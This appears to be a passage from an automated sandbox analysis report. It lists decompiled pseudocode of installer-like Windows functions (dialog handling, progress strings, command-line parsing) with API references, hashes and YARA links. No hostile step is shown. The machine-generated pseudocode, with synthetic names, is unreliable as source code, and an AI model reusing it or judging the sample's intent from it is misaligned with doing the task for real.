						if( *((intOrPtr*)(_t41 + 0x10)) == 0) {
							goto L17;
						}
						L0041C160();
						 *((intOrPtr*)( *_t74 + 8))(_t74, _v12);
						_t31 = 1;
						goto L20;
					}
				}
				goto L8;
			}





















                                          0x0040136b
                                          0x0040136c
                                          0x00401377
                                          0x00401379
                                          0x00401463
                                          0x00401463
                                          0x00401465
                                          0x00401469
                                          0x00401469
                                          0x0040137f
                                          0x00401386
                                          0x00000000
                                          0x00000000
                                          0x00401391
                                          0x00401393
                                          0x00000000
                                          0x00000000
                                          0x0040139b
                                          0x004013a4
                                          0x004013a5
                                          0x004013a7
                                          0x004013b0
                                          0x004013b1
                                          0x004013b6
                                          0x004013b9
                                          0x004013bc
                                          0x004013c1
                                          0x004013e6
                                          0x004013e6
                                          0x004013e9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004013c3
                                          0x004013c3
                                          0x004013c5
                                          0x004013cc
                                          0x004013d1
                                          0x004013d4
                                          0x004013d7
                                          0x004013d7
                                          0x004013da
                                          0x004013db
                                          0x004013e4
                                          0x004013f1
                                          0x004013f3
                                          0x004013f9
                                          0x004013fb
                                          0x00401408
                                          0x00401408
                                          0x004013fd
                                          0x00401404
                                          0x00401404
                                          0x0040140a
                                          0x0040140c
                                          0x00401411
                                          0x00401411
                                          0x00401414
                                          0x0040141f
                                          0x00401425
                                          0x00401425
                                          0x0040142e
                                          0x00401431
                                          0x00401433
                                          0x00401450
                                          0x00401450
                                          0x00401453
                                          0x00401459
                                          0x0040145b
                                          0x00401460
                                          0x00401460
                                          0x00000000
                                          0x00401435
                                          0x00401435
                                          0x00401438
                                          0x0040143b
                                          0x00000000
                                          0x00000000
                                          0x00401440
                                          0x00401449
                                          0x0040144c
                                          0x00000000
                                          0x0040144c
                                          0x00401433
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@$CountTick
                                          • String ID:
                                          • API String ID: 590505967-0
                                          • Opcode ID: 36a5861469329e3ffc0b6dc593449e4903cf603a1799691b629c633e4b490662
                                          • Instruction ID: 003ae7c08c8171e42d60e6727e1d5df914aaf81fbeeeab4e494b2dbabceb1a0e
                                          • Opcode Fuzzy Hash: 36a5861469329e3ffc0b6dc593449e4903cf603a1799691b629c633e4b490662
                                          • Instruction Fuzzy Hash: 5831D331A00210AFCB24AFA5C8859AEB7E4EF05754B10407FF905B72B2CB788D828B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405CA1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 71COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00405CA1(void* __edx, void* __edi, void* __eflags) {
				char _v16;
				char _v100;
				short _v356;
				void* _t28;
				WCHAR* _t49;
				signed int _t51;
				void* _t55;
				void* _t57;

				 *0x42245c = 8;
				E004075CF( &_v100, __edx, __eflags);
				_v100 = 0x41eaa0;
				E00414803( &_v16, E00403CE0(1));
				_t51 = 0;
				_t55 =  *0x424c60 - _t51; // 0x9
				if(_t55 > 0) {
					_t49 = L", ";
					do {
						if(_t51 != 0) {
							E00414922( &_v16, _t49);
						}
						E00414A08( &_v16,  *((intOrPtr*)( *((intOrPtr*)(0x424b20 + _t51 * 4)) + 0x10)));
						_t51 = _t51 + 1;
						_t57 = _t51 -  *0x424c60; // 0x9
					} while (_t57 < 0);
					if(_t51 != 0) {
						E00414922( &_v16, _t49);
					}
				}
				E00414922( &_v16, L"Volumes");
				wsprintfW( &_v356, L" \n\t%X - %03X - %03X - %03X - %03X", 1, 0x5ff, 0x1f, 0x3fff, 7);
				E00414922( &_v16,  &_v356);
				E00414922( &_v16, 0x41ebe4);
				_t28 = E00407941( &_v100, 0x11,  *0x422738, _v16, 0);
				_push(_v16);
				L0041C160();
				return E00407630(_t28,  &_v100);
			}











                                          0x00405cae
                                          0x00405cb8
                                          0x00405cc0
                                          0x00405cd0
                                          0x00405cd5
                                          0x00405cd7
                                          0x00405cdd
                                          0x00405ce0
                                          0x00405ce5
                                          0x00405ce7
                                          0x00405ced
                                          0x00405ced
                                          0x00405cff
                                          0x00405d04
                                          0x00405d05
                                          0x00405d05
                                          0x00405d0f
                                          0x00405d15
                                          0x00405d15
                                          0x00405d1a
                                          0x00405d23
                                          0x00405d44
                                          0x00405d57
                                          0x00405d64
                                          0x00405d79
                                          0x00405d7e
                                          0x00405d81
                                          0x00405d91

                                          APIs
                                            • Part of subcall function 004075CF: KiUserCallbackDispatcher.NTDLL ref: 00407611
                                            • Part of subcall function 004075CF: GetSystemMetrics.USER32 ref: 0040761F
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • wsprintfW.USER32 ref: 00405D44
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00405D81
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: memcpy$??3@CallbackDispatcherMetricsSystemUserwsprintf
                                          • String ID: %X - %03X - %03X - %03X - %03X$<A$Volumes
                                          • API String ID: 2991351368-3399665096
                                          • Opcode ID: cca3d016d0d10c9324117511857327f5cbdbfd0e0816387f27fc84f9d0f4fe5d
                                          • Instruction ID: ad8d23a7da3522afc9b8f86878820b42e07b12c4948eacb7cadc135188fea655
                                          • Opcode Fuzzy Hash: cca3d016d0d10c9324117511857327f5cbdbfd0e0816387f27fc84f9d0f4fe5d
                                          • Instruction Fuzzy Hash: 0A21A171D442186ACB14FB96EC46EDEB334FF80704F50417AB502760D1DB782A45CB8C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407489, Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E00407489() {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr* _t23;
				signed int _t25;
				signed int _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t41;
				intOrPtr _t42;
				signed int _t59;
				signed int _t60;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr _t68;
				intOrPtr* _t69;
				void* _t71;
				void* _t72;

				_push(_t42);
				_push(_t42);
				_v12 = _t42;
				if(( *0x422774 & 0x00000080) == 0) {
					L9:
					_t23 = 0;
					L10:
					return _t23;
				}
				_t41 = 0;
				_t71 =  *0x422704 - _t41; // 0x0
				if(_t71 > 0) {
					goto L9;
				}
				_t72 = E00401303(0x4227b8, _t71);
				if(_t72 == 0) {
					goto L9;
				}
				_t25 = E0040115F(0x4227b8);
				_t59 = 4;
				_t63 = _t25;
				_t60 = _t25 * _t59 >> 0x20;
				_t26 = _t25 * _t59;
				_push( ~(0 | _t72 > 0x00000000) | _t26);
				L0041C16C();
				_t68 = 0;
				_v8 = _t26;
				if(_t63 == 0) {
					L8:
					_push(_v8);
					L0041C160();
					goto L9;
				} else {
					goto L4;
				}
				do {
					L4:
					_t27 = E0040732B(_t68);
					if(_t27 != 0) {
						_t27 = _v8;
						 *((intOrPtr*)(_t27 + _t41 * 4)) = _t68;
						_t41 = _t41 + 1;
					}
					_t68 = _t68 + 1;
				} while (_t68 < _t63);
				if(_t41 != 0) {
					_push(0x48);
					L0041C16C();
					__eflags = _t27;
					if(_t27 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = E004025B4(_t27);
					}
					__eflags = _t69;
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 4))(_t69);
					}
					_t64 = _v12;
					E00407370(_t64, _t60);
					_t17 = _t64 + 4; // 0x700062
					E004023C3(_t69,  *_t17);
					_t30 =  *0x4227c0; // 0x9d2680
					_t31 =  *((intOrPtr*)( *_t30 + 0x1c))(_t30, _v8, _t41, 0, _t69);
					_push(_v8);
					__eflags = _t31;
					if(_t31 == 0) {
						L0041C160();
						__eflags = _t69;
						if(_t69 != 0) {
							 *((intOrPtr*)( *_t69 + 8))(_t69);
						}
						_t23 = 1;
						goto L10;
					} else {
						L0041C160();
						__eflags = _t69;
						if(_t69 != 0) {
							 *((intOrPtr*)( *_t69 + 8))(_t69);
						}
						goto L9;
					}
				}
				goto L8;
			}






















                                          0x0040748c
                                          0x0040748d
                                          0x00407498
                                          0x0040749b
                                          0x00407502
                                          0x00407502
                                          0x00407504
                                          0x00407508
                                          0x00407508
                                          0x0040749d
                                          0x0040749f
                                          0x004074a5
                                          0x00000000
                                          0x00000000
                                          0x004074b3
                                          0x004074b5
                                          0x00000000
                                          0x00000000
                                          0x004074b9
                                          0x004074c2
                                          0x004074c3
                                          0x004074c5
                                          0x004074c5
                                          0x004074ce
                                          0x004074cf
                                          0x004074d4
                                          0x004074d7
                                          0x004074dc
                                          0x004074f9
                                          0x004074f9
                                          0x004074fc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004074de
                                          0x004074de
                                          0x004074e0
                                          0x004074e7
                                          0x004074e9
                                          0x004074ec
                                          0x004074ef
                                          0x004074ef
                                          0x004074f0
                                          0x004074f1
                                          0x004074f7
                                          0x00407509
                                          0x0040750b
                                          0x00407511
                                          0x00407513
                                          0x00407520
                                          0x00407520
                                          0x00407515
                                          0x0040751c
                                          0x0040751c
                                          0x00407522
                                          0x00407524
                                          0x00407529
                                          0x00407529
                                          0x0040752c
                                          0x00407531
                                          0x00407536
                                          0x0040753b
                                          0x00407540
                                          0x0040754f
                                          0x00407552
                                          0x00407555
                                          0x00407557
                                          0x0040756b
                                          0x00407571
                                          0x00407573
                                          0x00407578
                                          0x00407578
                                          0x0040757b
                                          0x00000000
                                          0x00407559
                                          0x00407559
                                          0x0040755f
                                          0x00407561
                                          0x00407566
                                          0x00407566
                                          0x00000000
                                          0x00407561
                                          0x00407557
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@
                                          • String ID:
                                          • API String ID: 4113381792-0
                                          • Opcode ID: c57e1d113ab936110b80036a3b8050ea2227ed2d44b3e8fca11897c12ae9fda5
                                          • Instruction ID: 58b793ad712c308d4ddd91de517e6b93f9a326b0b37e95d3d2077ce1cdaad68c
                                          • Opcode Fuzzy Hash: c57e1d113ab936110b80036a3b8050ea2227ed2d44b3e8fca11897c12ae9fda5
                                          • Instruction Fuzzy Hash: 51312871E095217BCB256F648C459AFB7649F41B14B10007FF9427B7D2CB78AC02869E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004015B3, Relevance: 7.6, APIs: 5, Instructions: 88stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E004015B3(void* __ecx) {
				signed int _v5;
				signed int _v16;
				signed short* _v20;
				char _v32;
				signed int _t23;
				signed short* _t26;
				signed int _t28;
				signed short* _t31;
				void* _t35;
				signed short* _t39;
				signed int _t46;
				signed int _t49;
				WCHAR** _t50;
				void* _t51;
				signed int _t52;

				_t35 = __ecx;
				_t50 = 0x422090;
				if( *0x422090 == 0) {
					L4:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t23 = lstrlenW( *_t50);
					_t46 =  *_t50;
					_t49 = _t23;
					if(E00403786(_t35, _t46, _t49) == 0 &&  *((short*)(_t35 + _t49 * 2)) == 0x3d) {
						break;
					}
					_t50 =  &(_t50[1]);
					if( *_t50 != 0) {
						continue;
					}
					goto L4;
				}
				E00414803( &_v20, _t35);
				_t39 = _v20;
				__eflags =  *_t39;
				_t26 = _t39;
				_v5 = 0;
				if(__eflags == 0) {
					L15:
					_t28 = _t26 - _t39 >> 1;
					_v16 = _t28;
					_t51 = _t28 + _t28;
					 *((short*)(_t51 + _t39)) = 0;
					E0040438B( &_v32,  &_v20, __eflags, 0xfde9);
					_t31 = E0040502A( &_v32, 1, __eflags);
					_push(_v32);
					__eflags = _t31;
					if(_t31 != 0) {
						L0041C160();
						_push(_v20);
						L0041C160();
						return _t51 + _t35;
					}
					L0041C160();
					_push(_v20);
					L0041C160();
					return 1;
				} else {
					goto L7;
				}
				do {
					L7:
					_t52 =  *_t26 & 0x0000ffff;
					__eflags = _t52 - 0x20;
					if(_t52 > 0x20) {
						goto L9;
					}
					__eflags = _v5;
					if(__eflags == 0) {
						goto L15;
					}
					L9:
					__eflags = _t52 - 0x22;
					if(_t52 != 0x22) {
						__eflags = _t52 - 0x5c;
						if(_t52 == 0x5c) {
							__eflags = _t26[1] - 0x22;
							if(_t26[1] == 0x22) {
								_t26 =  &(_t26[1]);
								__eflags = _t26;
							}
						}
					} else {
						__eflags = _v5;
						_t46 = _t46 & 0xffffff00 | _v5 == 0x00000000;
						_v5 = _t46;
					}
					_t26 =  &(_t26[1]);
					__eflags =  *_t26;
				} while (__eflags != 0);
				goto L15;
			}


















                                          0x004015c3
                                          0x004015c5
                                          0x004015ca
                                          0x004015f3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004015cc
                                          0x004015cc
                                          0x004015ce
                                          0x004015d4
                                          0x004015d6
                                          0x004015e2
                                          0x00000000
                                          0x00000000
                                          0x004015eb
                                          0x004015f1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004015f1
                                          0x004015fe
                                          0x00401603
                                          0x00401606
                                          0x0040160a
                                          0x0040160c
                                          0x00401610
                                          0x00401649
                                          0x0040164b
                                          0x0040164d
                                          0x00401650
                                          0x00401655
                                          0x00401664
                                          0x0040166e
                                          0x00401673
                                          0x00401676
                                          0x00401678
                                          0x00401691
                                          0x00401696
                                          0x00401699
                                          0x00000000
                                          0x004016a0
                                          0x0040167a
                                          0x0040167f
                                          0x00401682
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00401612
                                          0x00401612
                                          0x00401612
                                          0x00401615
                                          0x00401618
                                          0x00000000
                                          0x00000000
                                          0x0040161a
                                          0x0040161e
                                          0x00000000
                                          0x00000000
                                          0x00401620
                                          0x00401620
                                          0x00401623
                                          0x00401631
                                          0x00401634
                                          0x00401636
                                          0x0040163b
                                          0x0040163d
                                          0x0040163d
                                          0x0040163d
                                          0x0040163b
                                          0x00401625
                                          0x00401625
                                          0x00401629
                                          0x0040162c
                                          0x0040162c
                                          0x00401640
                                          0x00401643
                                          0x00401643
                                          0x00000000

                                          APIs
                                          • lstrlenW.KERNEL32(00422090,?,009D2586,004227B8,?,?,?,?,?,?,0040197C), ref: 004015CE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040167A
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401682
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401691
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401699
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$lstrlen
                                          • String ID:
                                          • API String ID: 2031685711-0
                                          • Opcode ID: 6e300843ff67a2a88a322c4735bf088cad46bbe0d2c8f862c11a2a388a4ba63a
                                          • Instruction ID: 15beb7f568587da81f6b74c4144e5d976d5c6ef319186cdd4b388d545bbf5f64
                                          • Opcode Fuzzy Hash: 6e300843ff67a2a88a322c4735bf088cad46bbe0d2c8f862c11a2a388a4ba63a
                                          • Instruction Fuzzy Hash: 4921D432E04215ABDB34AB64DC817EFB3B5AB51304F14483FE542B72E1E6B94D45CA4D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409190, Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00409190(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				struct _SHFILEINFOW _v712;
				short _v1236;
				void* _t32;
				void* _t40;
				void* _t44;

				_t40 = __edx;
				_t44 = __ecx;
				E00407925(__ecx, 0x4b6,  &_v20);
				 *((intOrPtr*)(_t44 + 0x58)) = _v8 - _v16 + 2;
				E004079B7(_t44, 0x4b6, 1);
				E004079B7(_t44, 0x4b6, 1);
				_v712.hIcon = _v712.hIcon & 0x00000000;
				memset( &(_v712.iIcon), 0, 0x2b0);
				GetSystemDirectoryW( &_v1236, 0x104);
				SHGetFileInfoW( &_v1236, 0,  &_v712, 0x2b4, 0x103);
				 *(_t44 + 0x50) = _v712.hIcon;
				 *((intOrPtr*)(_t44 + 0x54)) = SetWindowLongW(GetDlgItem( *(_t44 + 4), 0x4b7), 0xfffffffc, E0040808C);
				_t32 = E00408E57(_t40);
				E004085BD();
				return _t32;
			}











                                          0x00409190
                                          0x004091a5
                                          0x004091a7
                                          0x004091ba
                                          0x004091bd
                                          0x004091c8
                                          0x004091cd
                                          0x004091e2
                                          0x004091f6
                                          0x00409216
                                          0x00409226
                                          0x0040923f
                                          0x00409242
                                          0x0040924b
                                          0x00409255

                                          APIs
                                            • Part of subcall function 00407925: GetDlgItem.USER32 ref: 0040792D
                                            • Part of subcall function 004079B7: GetDlgItem.USER32 ref: 004079C4
                                            • Part of subcall function 004079B7: ShowWindow.USER32(00000000,?), ref: 004079DB
                                          • memset.MSVCRT ref: 004091E2
                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091F6
                                          • SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 00409216
                                          • GetDlgItem.USER32 ref: 00409229
                                          • SetWindowLongW.USER32 ref: 00409237
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409247), ref: 00408E81
                                            • Part of subcall function 00408E57: LoadIconW.USER32(00000000), ref: 00408E84
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E98
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E9D
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409247), ref: 00408EA6
                                            • Part of subcall function 00408E57: LoadImageW.USER32 ref: 00408EA9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EC9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408ED2
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EEF
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EF9
                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(?,000000F0), ref: 00408F05
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F14
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F22
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F30
                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(000000F0,000000F0), ref: 00408F3C
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F4B
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F58
                                            • Part of subcall function 004085BD: GetDlgItem.USER32 ref: 004085D3
                                            • Part of subcall function 004085BD: SetFocus.USER32(00000000,?,?,?,?,00408678,?), ref: 004085D6
                                            • Part of subcall function 004085BD: GetDlgItem.USER32 ref: 004085E6
                                            • Part of subcall function 004085BD: GetDlgItem.USER32 ref: 004085FB
                                            • Part of subcall function 004085BD: SendMessageW.USER32(00000000,000000B1,0000002C,0000002C), ref: 00408605
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShowmemset
                                          • String ID:
                                          • API String ID: 358862773-0
                                          • Opcode ID: 81ec041cacca2d59917e046878064d1098f3cedd17596b8ea65ee1b3a9ebd4b2
                                          • Instruction ID: 2561db17b14fe2180de4adf028dc837e5a6c8d79ccad7adf452e374fc0286804
                                          • Opcode Fuzzy Hash: 81ec041cacca2d59917e046878064d1098f3cedd17596b8ea65ee1b3a9ebd4b2
                                          • Instruction Fuzzy Hash: 941186B1E40314A7DB20ABA5DD49F9E77BCAB84B04F00456FB651E32C1DBB8D9448B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004085BD, Relevance: 7.5, APIs: 5, Instructions: 36windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004085BD() {
				int _t8;
				void* _t12;
				void* _t15;

				_t15 = _t12;
				SetFocus(GetDlgItem( *(_t15 + 4), 0x4b6));
				E0040790B(GetDlgItem( *(_t15 + 4), 0x4b6),  *0x42289c);
				_t8 =  *0x4228a0; // 0x2c
				_t16 = _t8;
				return SendMessageW(GetDlgItem( *(_t15 + 4), 0x4b6), 0xb1, _t8, _t16);
			}






                                          0x004085cd
                                          0x004085d6
                                          0x004085eb
                                          0x004085f0
                                          0x004085f9
                                          0x00408610

                                          APIs
                                          • GetDlgItem.USER32 ref: 004085D3
                                          • SetFocus.USER32(00000000,?,?,?,?,00408678,?), ref: 004085D6
                                          • GetDlgItem.USER32 ref: 004085E6
                                            • Part of subcall function 0040790B: SetWindowTextW.USER32(00000000,00000000), ref: 00407913
                                          • GetDlgItem.USER32 ref: 004085FB
                                          • SendMessageW.USER32(00000000,000000B1,0000002C,0000002C), ref: 00408605
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Item$FocusMessageSendTextWindow
                                          • String ID:
                                          • API String ID: 3590784419-0
                                          • Opcode ID: e6a2ec5d3cd3bb36a0cbfbe33b996c03fcc3e893fcc4284e1da6b571b5e81bd3
                                          • Instruction ID: dfb0d4cc9c3e97a0b9eaad954ec70788f15d407bef407a446d7597729d91de54
                                          • Opcode Fuzzy Hash: e6a2ec5d3cd3bb36a0cbfbe33b996c03fcc3e893fcc4284e1da6b571b5e81bd3
                                          • Instruction Fuzzy Hash: 9AF0E5F260021CBFEB203762ED48C6BBF9DEB893543014039F61182220CB76AC008B74
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004169D1, Relevance: 7.5, APIs: 5, Instructions: 15COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E004169D1(intOrPtr* __ecx) {
				void* _t5;

				_push( *((intOrPtr*)(__ecx + 0x34)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x18)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xc)));
				L0041C160();
				_push( *__ecx);
				L0041C160();
				return _t5;
			}




                                          0x004169d4
                                          0x004169d7
                                          0x004169dc
                                          0x004169df
                                          0x004169e4
                                          0x004169e7
                                          0x004169ec
                                          0x004169ef
                                          0x004169f4
                                          0x004169f6
                                          0x004169ff

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 8a5a2e405d1432d98089c8393cabaddf830d6e4b9731c333b05916df35becb7d
                                          • Instruction ID: f2f6c36ad054111763b42ac461140cf9b87e5ea67fb04b9142b7eb6dfeeb418c
                                          • Opcode Fuzzy Hash: 8a5a2e405d1432d98089c8393cabaddf830d6e4b9731c333b05916df35becb7d
                                          • Instruction Fuzzy Hash: 15D0C7395C0534BACA223B16EC439C77AB1AF00B18305056FB08611433DAD67CE19E4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00408765, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E00408765(intOrPtr* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				char _v40;
				int _t39;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t56;
				int _t58;
				intOrPtr _t60;
				intOrPtr _t70;
				char* _t74;
				intOrPtr* _t75;

				_t75 = __ecx;
				E00408491(__ecx);
				_t39 = GetSystemMetrics(7);
				_t60 =  *0x422460; // 0x12c
				if( *((intOrPtr*)(_t75 + 0x14)) < _t60 - _t39) {
					_t58 = GetSystemMetrics(7);
					_t70 =  *0x422460; // 0x12c
					 *((intOrPtr*)(_t75 + 0x14)) = _t70 - _t58;
				}
				E00414803( &_v24,  *((intOrPtr*)(_t75 + 0xc)));
				_t74 = L" 100%% ";
				if(( *0x42245c & 0x00000002) == 0) {
					E00414922( &_v24, _t74);
				}
				if(E00407803(_t75, _v24,  &_v12) != 0) {
					_t56 = _v12;
					if(_t56 >  *((intOrPtr*)(_t75 + 0x14))) {
						 *((intOrPtr*)(_t75 + 0x14)) = _t56;
					}
				}
				E00407925(_t75, 0x4b8,  &_v40);
				 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) + _v28 - _v36 + 0xe;
				if(( *0x42245c & 0x00000004) != 0) {
					_push(0x820);
					_push( *((intOrPtr*)(_t75 + 0x34)));
					_push(_t75 + 0x50);
					_push(_t74);
					if( *((intOrPtr*)( *_t75 + 8))() != 0) {
						 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) +  *((intOrPtr*)(_t75 + 0x5c));
					}
					 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) + 5;
				}
				 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) + 0xffffffee;
				_t48 =  *((intOrPtr*)(_t75 + 0x18));
				if( *0x422770 != 1) {
					_t49 = _t48 + 0xa;
					 *((intOrPtr*)(_t75 + 0x18)) = _t49;
				} else {
					E00407925(_t75, 0x4b4,  &_v40);
					_t49 = _v36 - _v28;
					 *((intOrPtr*)(_t75 + 0x18)) =  *((intOrPtr*)(_t75 + 0x18)) + _t49;
				}
				_push(_v24);
				L0041C160();
				return _t49;
			}

















                                          0x0040876d
                                          0x0040876f
                                          0x0040877c
                                          0x0040877e
                                          0x00408789
                                          0x0040878d
                                          0x0040878f
                                          0x00408797
                                          0x00408797
                                          0x004087a0
                                          0x004087ac
                                          0x004087b1
                                          0x004087b7
                                          0x004087b7
                                          0x004087cc
                                          0x004087ce
                                          0x004087d4
                                          0x004087d6
                                          0x004087d6
                                          0x004087d4
                                          0x004087e4
                                          0x004087f2
                                          0x004087fc
                                          0x00408800
                                          0x00408805
                                          0x0040880b
                                          0x0040880c
                                          0x00408814
                                          0x00408819
                                          0x00408819
                                          0x0040881c
                                          0x0040881c
                                          0x00408820
                                          0x0040882b
                                          0x0040882e
                                          0x0040884b
                                          0x0040884e
                                          0x00408830
                                          0x0040883b
                                          0x00408843
                                          0x00408846
                                          0x00408846
